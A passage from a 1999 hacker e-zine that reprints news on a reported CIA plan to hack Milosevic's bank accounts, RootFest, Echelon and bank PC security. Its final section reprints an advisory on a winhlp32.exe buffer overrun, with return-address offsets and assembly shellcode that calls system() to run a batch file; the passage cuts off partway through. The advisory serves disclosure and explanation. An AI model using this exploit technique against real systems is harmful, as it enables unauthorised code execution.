*down on people and shit, not a good time for hacker groups right now as
*it looks like the crackdown is only going to get worse in the future.
*
*Anyway, drop into #hwa.hax0r.news the key is usually off and we're a
*friendly bunch, stop by and chat about some of the stories here or that
*you've seen elsewhere, other than that take it easy til next time...
*
*Here's #20, have at it...<snork, snork>
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Clinton Authorizes Cyber Attack???
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Sangfroid
Reuters and Wired Online articles are referencing a print
story in Newsweek that claims that President Clinton
has authorized a "top-secret" plan against Slobodan
Milosevic. One part of this plan would use "computer
hackers" to attack his foreign bank accounts. Reuters
also claimed that Newsweek said that the report
instructed the CIA to wage "cyberwar" against Milosevic.
Now there are still a few questions that are not
answered in this news article. If the report was so
top-secret how did NewsWeek learn of it? Won't other
countries be rather upset when we "hack" into their
banks? And aren't his bank accounts frozen anyway, so
what is the point of breaking in? News week even
admits that it does not have access to the original
report. Once again until we see confirmation HNN will
treat this story as extremely suspect.
Newsweek
http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm
Reuters- Via Yahoo
http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19990523/ts/yugoslavia_usa_cyberwar_2.html
Wired
http://www.wired.com/news/news/politics/story/19836.html
Newsweek
EXCLUSIVE
Cyberwar and Sabotage
President Clinton has OK'd a top-secret plan to destabilize
Milosevicand go after his money
By Gregory L. Vistica
Covert action is seductive to policymakers in a bind. When diplomacy fails
and force falls short, presidents often turn to the CIA for secret solutions
to vexing problems. Unable to make the air war against Serbian leader
Slobodan Milosevic effective, and unwilling to invade with ground troops,
President Clinton has decided to try a clandestine third way. Earlier this
month national-security adviser Sandy Berger presented Clinton with a
covert plan to squeeze Milosevic.
The president liked the idea. Senior intelligence officials tell NEWSWEEK
that last week Clinton issued a "finding," a highly classified document
authorizing the spy agency to begin secret efforts "to find other ways to get
at Milosevic," in the words of one official. Two weeks ago Berger secretly
briefed members of the House and Senate Intelligence committees about
the details of the two-part plan. According to sources who have read the
finding, the CIA will train Kosovar rebels in sabotageage-old tricks like
cutting telephone lines, blowing up buildings, fouling gasoline reserves and
pilfering food suppliesin an effort to undermine public support for the
Serbian leader and damage Yugoslav targets that can't be reached from
the air. That much is unsurprising. But the CIA has also been instructed to
conduct a cyberwar against Milosevic, using government hackers to tap
into foreign banks and, in the words of one U.S. official, "diddle with
Milosevic's bank accounts."
The finding was immediately criticized by some lawmakers who
questioned the wisdomand legalityof launching a risky covert action
that, if discovered, could prolong the war, alienate other NATO
countriesand possibly blow back on the United States. Under the
finding, the allies were to be kept in the dark about the plan. Other
members of Congress privy to the finding wondered about its timing. Why
did Clinton authorize the operation just as diplomats had begun making
progress on a peace agreement? The White House declined to comment
on the finding, and NEWSWEEK does not have access to the entire
document. But some intelligence officials with knowledge of its contents
worry that the finding was put together too hastily, and that the potential
consequences haven't been fully thought out. "If they pull it off, it will be
great," says one government cyberwar expert. "If they screw it up, they
are going to be in a world of trouble."
By far the most controversialand probably most difficultpart of the
operation would be the effort to hack into Milosevic's foreign bank
accounts. Intelligence sources believe they have identified banks in several
countries, including Russia, Greece and Cyprus, where the Serb leader has
hidden millions of dollars. But the Hollywood vision of a brainy nerd
draining bank accounts from his computer at CIA headquarters is a
fantasy. According to government intelligence experts, agents would have
to visit each of the banks, set up new accounts, then carefully watch how
the institution operates and look for weak links in its security. The National
Security Agency's hackers would use that information to try to overcome
today's sophisticated encryption software and fire walls. If they gained
access, the hackers could do almost anything they liked with Milosevic's
cashsteal it, move it to a dummy account or slowly drain it away a few
thousand dollars at a time.
But should they? The idea of a U.S.-sponsored plan to break into foreign
banks unnerves some intelligence officials, who point out that the operation
would be a breach of national sovereignty in friendly countries and open
the door to computer attacks on U.S. banks. What's more, the United
States would be the main loser if confidence in the world banking system
were undermined.
The sabotage plan also entails some serious problems. The CIA would
somehow have to find and train guerrillas without helping the Kosovo
Liberation Army, which the administration itself labeled a terrorist
organization just a year ago and which is believed to fund its operations
with profits from international drug smuggling. In the chaos now prevailing
in Kosovar refugee camps it will not be easy for the CIA to make sure the
anti-Milosevic rebels it signs up have no KLA ties. Intelligence officials
also worry it would be difficult to control the U.S.-trained rebels once
boot camp is over and they are set loose on Milosevic. "I'm afraid they
could use their training to carry out atrocities," says John Rothrock, the Air
Force's former chief of intelligence planning. "If they think they can rein
them in, it's tremendous naiveté."
Congress can complain all it likes, but it has no legal authority to stop the
finding. Lawmakers can try to block the plan by refusing to provide money
for the covert action, but the president can tap into his emergency funds to
finance it. At this point, it is not at all certain that the finding will ultimately
be carried out. If the grumblings from the Hill and the intelligence
community grow too loud, or if the risk-averse CIA chooses to drag its
feet, the president may opt to quietly kill the findingand pretend it never
existed.
Newsweek, May 31, 1999
@HWA
03.1 More on the Cyberwar
~~~~~~~~~~~~~~~~~~~~
Contributed by Twstdpair (Source: MSNBC)
Cyberwar? The U.S. stands to lose
Experts argue plan to raid Milosevic's bank accounts would do more harm
than good
May 28 - It sounded like a TomClancy spy novel.Newsweekreported last week
that the CIAwas planning to tinker withinternational bank accounts fullof Slobodan
Milosevic's money -just another way of getting under the Yugoslav president's skin.
Information warfare experts disagree about the feasibility of such a cyberattack. But
there's little disagreement the U.S. stands to lose much more than itmight gain from
firing the firstvolley in such an infomation war.In fact, some believe damage has
already been done.
THE NEWSWEEK STORY RAISED several issues: What international lawswould govern a
U.S.-backed attack ona bank in a third-party nation? Is suchan attack feasible in the
first place? What kind of retaliation might U.S.citizens, and their bank accounts,
face? But most important, what does even the possibility of such an attack do to the
integrity of international banking systems? The story on the cyberattack - fact, fiction
or somewhere in between - could already have put the U.S. at risk,said Kawika M. Dajuio,
executive vice president of the Financial Information Protection Association.
Banking systems hinge on public confidence. You put the money in; you're confident you'll
be able to take the money out. If there's any hint you might not be able to get at your
money, you'd withdraw it. Any attack on the integrity of a banking system anywhere -
particularly when retaliation seems like such an obvious possibility - chips away at
public confidence. "It bothers me because we have had conversations with the defense and
intelligence community. We thought this was off the table," Dajuio said. "We've had
discussions with rather senior policy-makers. We thought they understood the importance
of protecting public confidence in the payment system." But retaliation by foreign agents
might be just one source of insecurity for U.S. account holders. There's another: If the
government can and is willing to tinker with foreign accounts, what will stop it from
tinkering with mine?
COULD IT BE DONE? Could U.S. agents hijack Milosevic's money, allegedly stashed away in
foreign banks? Yes and no. Experts agree that the CIA has had the know-how to control
bank accounts for years, through old- fashioned non-cyber methods, such as coercing bank
authorities, or even through legal methods such as freezing accounts. On the other hand,
it's not easy when the target knowns what's coming. According to MSNBC analyst Bill Arkin,
the international community, including UNSCOM, is still trying to get its hands on Saddam
Hussein's assets. And such real-world tactics are a far cry from the cyberwar image of a
few CIA hackers sitting at a keyboard moving around money thanks to an Internet connection
and some wits. There's disagreement about how possible that might be. "The audits we have
performed tell us [banks] are not invulnerable," says a security expert identifying himself
as Space Rogue. Rogue works at L0pht Heavy Industries, which hires out to hack corporate
computer systems to test their vulnerability. "Banks have a little more security in place,
but that security is still not at a level where it's unbreakable." While money systems aren't
connected to the public Internet, "sometimes they have a modem dangling off for remote access,
or they use cryptography, but not correctly," he said. Others suggest cracking a bank that
holds Milosevic money - outside the more traditional methods - is nearly impossible. "I deal
in probabilities, and I've never seen it," said a man identifying himself as Louis Cipher, a
principal investor in Infowar.com. Cipher is also in charge of security at what he says is the
"sixth-largest brokerage in America." He suggested very few individuals have the skills
necessary to "tunnel" from an Internet connection through mainframe systems in banks - in
fact, a team of specialists and inside information would be required."You'd have to be an
applications specialist to even navigate to a screen," he said. "You're talking well beyond
the skills of hackers. It would have to be an insider working with Job Control Language
sitting on the mainframe. The only one who would have that ability other than the U.S.
government would be organized crime." And Cipher is skeptical about the U.S. government's
ability to hire and hold the brightest minds in the security industry - since no government
agency can match the lure of stock options offered by a high-tech firm. Still, even the
possibility of the U.S. using a wired computer to move Milosevic's money drew swift reaction
from information warfare observers. Even hacker groups protested the notion, with a hacker
calling himself "sixtoed" setting up a Web page in protest. The reason: Since the U.S. relies
more on technology and information than any other nation, it stands to lose the most from such
a cyberwar. "I am not one for an information arms race," said Frank Cilluffo, senior analyst at
the Center for Strategic and International Studies in Washington. "We will lose that race....
We're a hell of a lot more susceptible to retaliation. The defensive implications outweigh the
offensive implications." Anyone can build up an information
warfare capability, Cilluffo said. And it's much more like guerrilla war than nuclear war - it's
easy for the enemy to hide, and there's no real deterrent. Therefore, retaliation could be swift
and indiscriminate. In addition, there is a general principle among security experts suggesting
once a system's security is compromised, it's much easier to compromise a second time. So the U.S.
could very well be paving the way for retribution.
WHY NO DENIALS? Fear of such retaliation attempts, or even the perception of such retaliation
attempts, drove Dajuio to start calling his friends on the intelligence community to complain
as soon as the Newsweek story hit. He has yet to receive the reassurance he was hoping for.
"If it's true or it's just leaks, it's bad to have the story out there," Dajuio said. "I have yet
to have anyone tell me 'Don't worry, everything's OK.' ... If they haven't done anything, the
most appropriate thing to do is to come out and say they're not doing it."
The CIA isn't doing that; a spokesperson told MSNBC the agency couldn't comment on its activities,
but one source familiar with U.S. intelligence capabilities tells MSNBC to be "very skeptical" of the
Newsweek story. Meanwhile, opening the Pandora's box of cyberwar would lead to a
series of yet-to-be answered questions. International law isn't ready to handle such conflicts, says
Cilluffo - so if the U.S. broke into a bank in Cyprus, what laws would govern that act? And could the
compromised bank sue the U.S. government? "What are the rules of engagement
here?" Cilluffo asked. "What is game, what is not game? This may be a harbinger of how we prosecute and
wage war in the future."
@HWA
04.0 RootFest Scares Officials In Minneapolis
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
The hacker convention RootFest was held in Minneapolis
over the weekend. Evidently this scared the local
authorities enough to shut down several vulnerable
points in its computer network. The city respond to the
three day hacker convention by shutting down some
older dial-up modem lines. (Wonder if they will come
back online afterwards?) Other reports also indicate
that the Minneapolis City Police also shut down its
computer network over the weekend.
APB Online
http://www.apbonline.com/911/1999/05/21/hackers0521_01.html
WCCO Channel 4
http://www.wcco.com/news/stories/news-990521-184737.html
RootFest
http://www.rootfest.org
City of Minneapolis Action Plan
http://www.rootfest.org/Press/park.txt
APB Online:
HACKERS WORRY MINNEAPOLIS OFFICIALS
City Secures Its Computers as Conference Comes to Town
May 21, 1999
By Hans H. Chen
MINNEAPOLIS (APBNews.com) -- The arrival of several hundred
computer hackers this weekend has prompted the city to shut down
several vulnerable points in its computer network.
While the city's computer guru called the weekend shutdown "an
opportunity to remind ourselves of network-based security," the
conference organizer called the measures "an overly paranoid
precaution."
The hackers descended today on the Minneapolis Convention Center for
RootFest 99, a three-day discussion of computer security open to "the
computer underground, hackers, IT professionals, government agents,
feds," according to the conference's Web site.
The conference features sessions entitled "Circumventing Internet
Censorship," and "Internet Security in Europe: State of Affairs."
Speakers include both hackers and computer security consultants
City downplays concerns
But the city responded to the event by closing off some older dial-up
modem lines that a few telecommuting employees and remote city
agencies still use to connect into the city's network.
Don Saelens, the city's information technology manager, downplayed
concerns about possible hacking attempts.
The conference, Saelens said, presented "an opportunity to remind
ourselves of network-based security."
But Saelens did admit that the timing of the system shutdown was not
wholly coincidental.
"We've been doing a number of upgrades on our own networks, and
these were all slated to go out anyway this year," Saelens said. "I have
to admit, [this conference] was a reminder of network security that
heightened the awareness."
Police reportedly shut down
In addition, the Minneapolis Star Tribune reported that the city Police
Department shut d
own its computer network over the weekend. Saelens
and a police official refused to confirm the report, citing safety
concerns.
"The only thing the police is saying is we are not releasing anything we
are doing for security reasons," said Penny Parrish, a police
department spokeswoman.
'Hacker threat'?
Chris Lothos, an organizer of RootFest, attacked the city's measures in
a dispatch on the RootFest Web site.
"It's an overly paranoid precaution taken for the 'hacker threat' that
RootFest supposedly poses to the world at large," Lothos wrote.
The conference also printed on its Web site a copy of the e-mail memo
Saelens sent to city employees alerting them to the security measures.
Saelens said he's not sure how the group got a copy of his e-mail.
>Subject: FW: NOTICE TO ALL PARK BOARD COMPUTER USERS regarding Hacker
>Conference this weekend
>Importance: High
>
>Minneapolis Park and Recreation ITS Hacker conference action plan:
>
> In response to the City's action plan noted below, Park Board ITS
>will be disabling the Park Board's Email services Friday evening, May 21st
>through Monday morning, May 24th. Park Board users will not have access
>at all to their Park Board Email accounts during this time.
>
>In addition - Dial-In (Reachout) services will be disabled Thursday
>evening, May 20th beginning at 8:00pm through Monday morning, May 24th.
>The Minneapolis rec centers and other remote users will not be able to
>access their Reachout accounts during this time. Remote PEIRS users
>entering time are advised to do so by Thursday evening, May 20th by
>8:00pm.
>PEIRS users downtown, at the SSSC, or on frame-relay (golf courses) will
>be able to enter in time as usual.
>
>If you have questions, please contact the Park Board Help Desk at
>661-XXXX. Thank you for your cooperation.
>
>Larry Brandts
>Park Board ITS Manager
>
>
>-----Original Message-----
>From: XXXXXXXXXXX Sent: Wednesday, May 19, 1999 10:35 AM
>To: All Exchange Users
>Subject: NOTICE TO ALL CITY COMPUTER USERS
>
>To all City Staff,
>RootFest '99, a convention of so-called computer "hackers" will be meeting
>in Minneapolis this weekend, May 21-23. You may have read news stories
>about individuals (hackers) who have used their computer programming
>skills to gain unauthorized access (hack) into computer networks of
>government agencies, businesses, banks, or other high-profile
>organizations. Sometimes, these individuals hack into computers to
>perform fairly harmless computer pranks. However, that is not always the
>case. Hackers can also infect entire computer networks with disabling
>viruses.
>
>As a precautionary measure, we are reminding you of safe computing
>practices that should already be followed, as well as some additional
>steps we will be taking to protect the City from any unauthorized access
>to our network. To be successful, we will need the active participation
>of all City staff.
>
>1. Employees must turn off their computer terminals at the close of
>business each night.
>
>2. Those who have an individual analog phone line and modem should be
>turning off the modem every night. There are very few of these individual
>analog lines and modems left in the City, and they are being phased out
>because of their risk to network security. Anyone who has one of the new
>City image pc's does not have worry about this issue, as they are using
>the new City standard for remote access. If you have not had a line/modem
>installed, you do not need to do anything except turn off your pc.
>
>3. Employees will not have access to their City email accounts at all
>beginning Friday evening through Monday morning. There will not be access
>to email outside of the City from Thursday evening through Monday morning.
>
>4. Access to the City's network from outside locations will be
>temporarily cancelled Thursday evening through Monday morning. This will
>not impact the majority of staff members, but as an example, if you can
>currently check your City email account from home, you will not be able to
>do so during that timeframe.
>
>Employees who will be at work over the weekend will have access to Insite,
>the City's intranet, as well as the Internet.
> While I do not believe the City will be a target for these individuals,
>it
>is a prudent business decision to follow these simple safety precautions.
>If you have questions regarding any of these steps, please contact Wanda
>Forsythe, in ITS Security. Her number is 673-XXXX.
>
>Thank you for your attention to this matter.
>
>- Don Saelens
>* * * * * * * Sara Dietrich, Communications Department
>673-XXX; 673-XXXX (fax)
@HWA
05.0 Australia Admits to Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~
from HNN http://www.hackernews.com/
contributed by erewhon
Martin Brady, director of the Defense Signals Directorate
in Canberra Austrailia has admitted that his country
does participate in a secret spy organization known as
UKUSA. This organization works with the intelligence
agencies of Australia, Canada, New Zealand, the UK and
the USA to intercept every fax, telex, e-mail, phone
call, or computer data that is carried via commercial
satellite communications. This global eavesdropping is
known as Echelon
The Age
http://www.theage.com.au/daily/990523/news/news3.html
The Age;
Careful, they might hear you
By DUNCAN CAMPBELL
Australia has become the first country openly to admit that it
takes part in a global electronic surveillance system that
intercepts the private and commercial international
communications of citizens and companies from its own and
other countries. The disclosure is made today in Channel 9's
Sunday program by Martin Brady, director of the Defence
Signals Directorate in Canberra.
Mr Brady's decision to break ranks and officially admit the
existence of a hitherto unacknowledged spying organisation
called UKUSA is likely to irritate his British and American
counterparts, who have spent the past 50 years trying to prevent
their own citizens from learning anything about them or their
business of ``signals intelligence'' - ``sigint'' for short.
In his letter to Channel 9 published today, Mr Brady states that
the Defence Signals Directorate (DSD) ``does cooperate with
counterpart signals intelligence organisations overseas under the
UKUSA relationship".
In other statements which have now been made publicly
available on the Internet (www.dsd.gov.au), he also says that
DSD's purpose ``is to support Australian Government
decision-makers and the Australian Defence Force with
high-quality foreign signals intelligence products and services.
DSD (provides) important information that is not available from
open sources".
Together with the giant American National Security Agency
(NSA) and its Canadian, British, and New Zealand
counterparts, DSD operates a network of giant, highly
automated tracking stations that illicitly pick up commercial
satellite communications and examine every fax, telex, e-mail,
phone call, or computer data message that the satellites carry.
The five signals intelligence agencies form the UKUSA pact.
They are bound together by a secret agreement signed in 1947
or 1948. Although its precise terms have never been revealed,
the UKUSA agreement provides for sharing facilities, staff,
methods, tasks and product between the participating
governments.
Now, due to a fast-growing UKUSA system called Echelon,
millions of messages are automatically intercepted every hour,
and checked according to criteria supplied by intelligence
agencies and governments in all five UKUSA countries. The
intercepted signals are passed through a computer system called
the Dictionary, which checks each new message or call against
thousands of ``collection'' requirements. The Dictionaries then
send the messages into the spy agencies' equivalent of the
Internet, making them accessible all over the world.
Australia's main contribution to this system is an ultra-modern
intelligence base at Kojarena, near Geraldton in Western
Australia. The station was built in the early 1990s. At Kojarena,
four satellite tracking dishes intercept Indian and Pacific Ocean
communications satellites. The exact target of each dish is
concealed by placing them inside golfball like ``radomes''.
About 80 per cent of the messages intercepted at Kojarena are
sent automatically from its Dictionary computer to the CIA or
the NSA, without ever being seen or read in Australia. Although
it is under Australian command, the station - like its controversial
counterpart at Pine Gap - employs American and British staff in
key posts.
Among the ``collection requirements" that the Kojarena
Dictionary is told to look for are North Korean economic,
diplomatic and military messages and data, Japanese trade
ministry plans, and Pakistani developments in nuclear weapons
technology and testing. In return, Australia can ask for
information collected at other Echelon stations to be sent to
Canberra.
A second and larger, although not so technologically
sophisticated DSD satellite station, has been built at Shoal Bay,
Northern Territory. At Shoal Bay, nine satellite tracking dishes
are locked into regional communications satellites, including
systems covering Indonesia and south-west Asia.
International and governmental concern about the UKUSA
Echelon system has grown dramatically since 1996, when New
Zealand writer Nicky Hager revealed intimate details of how it
operated. New Zealand runs an Echelon satellite interception
site at Waihopai, near Blenheim, South Island. Codenamed
``Flintlock", the Waihopai station is half the size of Kojarena and
its sister NSA base at Yakima, Washington, which also covers
Pacific rim states. Waihopai's task is to monitor two Pacific
communications satellites, and intercept all communications from
and between the South Pacific islands.
Like other Echelon stations, the Waihopai installation is
protected by electrified fences, intruder detectors and infra-red
cameras. A year after publishing his book, Hager and New
Zealand TV reporter John Campbell mounted a daring raid on
Waihopai, carrying a TV camera and a stepladder. From open,
high windows, they then filmed into and inside its operations
centre.
They were astonished to see that it operated completely
automatically.
Although Australia's DSD does not use the term ``Echelon'',
Government sources have confirmed to Channel 9 that Hager's
description of the system is correct, and that the Australia's
Dictionary computer at Kojarena works in the same way as the
one in New Zealand.
Until this year, the US Government has tried to ignore the row
over Echelon by refusing to admit its existence. The Australian
disclosures today make this position untenable. US intelligence
writer Dr Jeff Richelson has also obtained documents under the
US Freedom of Information Act, showing that a US Navy-run
satellite receiving station at Sugar Grove, West Virginia, is an
Echelon site, and that it collects intelligence from civilian
satellites.
The station, south-west of Washington, lies in a remote area of
the Shenandoah Mountains. According to the released US
documents, the station's job is ``to maintain and operate an
Echelon site''. Other Echelon stations are at Sabana Seca,
Puerto Rico, Leitrim, Canada and at Morwenstow and London
in Britain.
Information is also fed into the Echelon system from taps on the
Internet, and by means of monitoring pods which are placed on
undersea cables. Since 1971, the US has used specially
converted nuclear submarines to attach tapping pods to deep
underwater cables around the world.
The Australian Government's decision to be open about the
UKUSA pact and the Echelon spy system has been motivated
partly by the need to respond to the growing international
concern about economic intelligence gathering, and partly by
DSD's desire to reassure Australians that its domestic spying
activity is strictly limited and tightly supervised.
According to DSD director Martin Brady, ``to ensure that (our)
activities do not impinge on the privacy of Australians, DSD
operates under a detailed classified directive approved by
Cabinet and known as the Rules on Sigint and Australian
Persons".
Compliance with this Cabinet directive is monitored by the
inspector-general of security and intelligence, Mr Bill Blick. He
says that ``Australian citizens can complain to my office about
the actions of DSD. And if they do so then I have the right to
conduct an inquiry."
But the Cabinet has ruled that Australians' international calls,
faxes or e-mails can be monitored by NSA or DSD in specified
circumstances. These include ``the commission of a serious
criminal offence; a threat to the life or safety of an Australian; or
where an Australian is acting as the agent of a foreign power".
Mr Brady says that he must be given specific approval in every
case. But deliberate interception of domestic calls in Australia
should be left to the police or ASIO.
Mr Brady claims that other UKUSA nations have to follow
Australia's lead, and not record their communications unless
Australia has decided that this is required. ``Both DSD and its
counterparts operate internal procedures to satisfy themselves
that their national interests and policies are respected by the
others," he says.
So if NSA happens to intercept a message from an Australian
citizen or company whom DSD has decided to leave alone, they
are supposed to strike out the name and insert ``Australian
national'' or ``Australian corporation'' instead. Or they must
destroy the intercept.
That's the theory, but specialists differ. According to Mr Hager,
junior members of UKUSA just can't say ``no''. ``... When
you're a junior ally like Australia or New Zealand, you never
refuse what they ask for.''
There are also worries about what allies might get up to with
information that Australia gives them. When Britain was trying to
see through its highly controversial deal to sell Hawk fighters and
other arms to Indonesia, staff at the Office of National
Assessments feared that the British would pass DSD intelligence
on East Timor to President Soeharto in order to win the lucrative
contract.
The Australian Government does not deny that DSD and its
UKUSA partners are told to collect economic and commercial
intelligence. Australia, like the US, thinks this is especially
justified if other countries or their exporters are perceived to be
behaving unfairly. Britain recognises no restraint on economic
intelligence gathering. Neither does France.
According to the former Canadian agent Mike Frost, it would
be ``nave" for Australians to think that the Americans were not
exploiting stations like Kojarena for economic intelligence
purposes. ``They have been doing it for years," he says. ``Now
that the Cold War is over, the focus is towards economic
intelligence. Never ever over-exaggerate the power that these
organisations have to abuse a system such as Echelon. Don't
think it can't happen in Australia. It does.''
@HWA
06.0 Banks to Test Home User PC Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from HNN http://www.hackernews.com/
contributed by Weld Pond
Worried that consumers PCs may be vulnerable to
attack a consortium of the 15 largest US banks plan to
open a lab to test PC Hardware and software. The
Banking Industry Technology Secretariat, plan to open
the lab this summer. (Its about time they started
looking into this. Applications like Back Orifice have been
around for what? over a year now? Sounds like someone
is just covering their ass.)
C|Net
http://www.news.com/News/Item/0,4,0-36923,00.html?st.ne.ni.lh
Big banks move on Net security
By Tim Clark
Staff Writer, CNET News.com
May 21, 1999, 1:00 p.m. PT
Worried that problems on home computers may make Internet banking insecure, a
group of major U.S. banks is expected to unveil a plan this summer to open a lab
to test the security of Web browsers and PC hardware and software.
"The banks feel that firewalls and what they have internally is in great shape, but the link is
to the consumer and PC environments [where they find security more suspect]," said
Catherine Allen, chief executive of the Banking Industry Technology Secretariat, a division
of Bankers Roundtable.
BITS is governed by a board of CEOs of the 15 largest U.S. banks, including familiar
names like Citibank, Chase Manhattan, Mellon Bank, Wells Fargo, and Bank of America.
Edward Crutchfield, First Union chief executive, chairs BITS, a two-year-old group that
focuses on technology issues affecting the U.S. banking system.
The BITS Security/Technology Lab, to be run by a new banking-oriented division of
government contractor SAIC, is due to be announced in late June or early July, with vice
president Al Gore and former U.S. Sen. Sam Nunn invited to speak. A July meeting is
planned in the San Francisco area to explain the program to hardware and software
vendors.
Security experts from major banks are currently drafting the testing criteria. In addition, the
lab oversight group is working with the President's Commission on Critical Infrastructure
Protection on ways to protect the nation's financial infrastructure from attacks by terrorist
or organized criminal groups. President Clinton formed that group a year ago after a report
on threats from cyber-terrorists.
The effort also will involve information sharing among banks to ward off organized attacks,
including use of neural networking and other technologies to detect and predict patterns of
attacks.
"If it's a terrorist or major criminal activity, we think it will happen in multiple places," Allen
said. "They won't hit just one bank but many." Security planners worry that assaults could
be mounted near the end of this year, when attackers hope banks might be distracted by
the Y2K turnover.
The testing of consumer devices and software will be coupled with educational campaigns
urging users to utilize antivirus software and take other precautions to avoid security
problems.
Systems that pass the tests can use a special logo in their marketing to signify the
products have been deemed safe by BITS. Also to be tested are systems to conduct
financial transactions, including personal financial software, online billing and bill-paying
packages, and smart cards.
"Vendors want this as much as we do," Allen contended, saying that today vendors may
get multiple requests from different banks to make specific changes for that bank's use.
Funneling through the BITS lab would simplify that process.
The effort comes as financial institutions are beginning to use the Internet for online
banking, stock trading, and other transactions. In the past, online consumer transactions
have been routed over private networks that banks regard as more secure. But the
explosion of the Internet, which is not such a controlled or secure environment, has
bankers looking for safety.
Another reflection of that concern has been the efforts by Visa and MasterCard, on the
behalf of their bank-owners, to push the Secure Electronic Transactions (SET) protocol for
Internet credit card purchases. Although SET has not been widely adopted in the U.S., the
prolonged push to implement it mirrors bankers' worries about their reputation as trusted
institutions.
But there's a financial implication too. Banks are heavily regulated, and they are required to
reimburse their customers for any losses suffered because of security breaches in online
financial transactions. As online banking grows, that could become a big liability.
@HWA
07.0 EMPEROR VIRUS
~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 25th May 1999 on 4.46 pm CET
AVP announced new clone of the Cheronobyl virus named Emperor. The Emperor
virus has additional technology to infect more systems by copying itself to more
areas of the computer and has the possibility to travel further. It infects DOS (16-bit)
COM and EXE programs and overwrites the Master Boot Record of the hard drive and
boot sector on floppy diskettes.
08.0 WINHLP32.EXE BUFFER OVERRUN
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 25th May 1999 on 1.01 am CET
David Litchfield aka Mnemonix wrote an advisory on winhlp32.exe buffer overrun. "The
buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly
long heading string. If the string is longer than 507 bytes the buffer overrun does not
occur - winhlp32 just truncates the entry." Read the advisory below.
Analysis of the winhlp32.exe buffer overrun.
The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt
file with an overly long heading string. If the string is longer than 507
bytes the buffer overrun does not occur - winhlp32 just truncates the entry.
The return address is overwritten with bytes 357, 358, 359 and 360.
Everything before these bytes is lost giving us bytes 361 to 507 to play
with - a total of 147 bytes for our exploit code. On playing around with the
overrun we find we lose about another 20 of these bytes giving us only 127
bytes to play with - not a lot really.
On overruning the buffer and analysing the contents of memory and the CPU's
registers with a debugger we find that byte 361 is found at 0x0012F0E4. This
is the address we need to get the processor to go to to get its next
instruction - but this address has a NULL in it which totally messes things
up. However, looking at the registers we can see that the ESP, the Stack
Pointer, holds this address so if we can find somewhere in memory that does
a JMP ESP, and set the return address to this then we should be able to get
back to the address where we'll place our exploit code. Looking at the DLLs
that winhlp32.exe uses we find that kernel32.dll has the JMP ESP instruction
at 0x77F327E5 (Service Pack 4's version of kernel32.lib - I think it's at
0x77F327D5 on Service Pack 3's kernel32.dll).
So we put 0x77F327E5 into bytes 357 to 360 but we have to load it in
backwards so byte 357 we'll set to 0xE5, byte 358 to 0x27, byte 359 to 0xF3
and byte 360 to 0x77.
Now we've jumped back to our exploit code we have to decide what we wan to
put in it. Because we only have 127 bytes to do anything meaningful we need
to start another program - the best thing is to get it to run a batch file.
This means calling the system ( ) function which is exported by msvcrt.dll
which isn't loaded into the address space of winhlp32.exe - so we'll have to
load it. How do we do this? We have to call LoadLibrary ( ) which is
exported by kernel32.dll which is in the address space. LoadLibraryA ( ) is
exported at address 0x77F1381A so all we need to do is have the string
"msvcrt.dll" in memory somewhere and call 0x77F1381A with a reference to the
pointer to the null terminated "msvcrt.dll" string. Because it has to be
null terminated we'll get our code to write it into memory. Once this is
done we'll place the address of LoadLibraryA ( ) onto the stack then place
the address of the pointer to "msvcrt.dll" and finally call LoadLibraryA ( )
using an offset from the EBP. The following is the Assembly Code needed to
do this:
/*First the procedure prologue */
push ebp
mov ebp,esp
/*Now we need some zeroes */
xor eax,eax
/* and then push then onto the stack */
push eax
push eax
push eax
/* Now we write MSVCRT.DLL into the stack */
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
/* move the address of LoadLibraryA ( ) into the edx register */
mov edx,0x77F1381A
/* and then push it onto the stack */
push edx
/* Then we load the address where the msvcrt.dll string can be found */
lea eax,[ebp-0Ch]
/* and push it onto the stack */
push eax
/* Finally we call LoadLibraryA( )
call dword ptr[ebp-10h]
All things going well we should have now loaded msvcrt.dll into the address
space of winhlp32.exe. With this in place we now need to call system() and
provide the name of a batch file to it as an argument. We don't have enough
bytes to play with to call GetProcessAddress ( ) and do the rest of the
things we have to do like clean up so we check what version of msvcrt.dll we
have before writing the code and see where system ( ) is exported at. On a
standard install of Windows NT this will normally be version 4.20.6201 with
system () exported at 0x7801E1E1. We'll call the batch file ADD.bat but to
save room we won't give it an extention. The system ( ) function will try
the default executable extentions like.exe, .com and .bat and find it for us
then run it. Once it has run it the cmd.exe process system( ) has launched
will exit.
So we need to have the null terminated string "ADD" in memory and the
address of system ( ). Below is the code that will write "ADD" onto the
stack and then call system( )
/*First the procedure prologue */
push ebp
mov ebp,esp
/* We need some NULL and then push them onto the stack */
xor edi,edi
push edi
/* Now we write ADD onto the stack */
mov byte ptr [ebp-04h],41h
mov byte ptr [ebp-03h],44h
mov byte ptr [ebp-02h],44h
/* Place address of system ( ) into eax and push it onto the stack */
mov eax, 0x7801E1E1
push eax
/* Now load eax with address of ADD and push this too */
lea eax,[ebp-04h]
push eax
/ * Then we call system ( ) */
call dword ptr [ebp-08h]
Once the batch file has been run the Command Interpreter will exit and if we
don't clean up after ourselves winhlp32.exe will access violate so we need
to call exit (0) to keep it quiet. exit ( ) is also exported by msvcrt.dll
at address 0x78005BBA - which has a null in it. It's not a major problem -
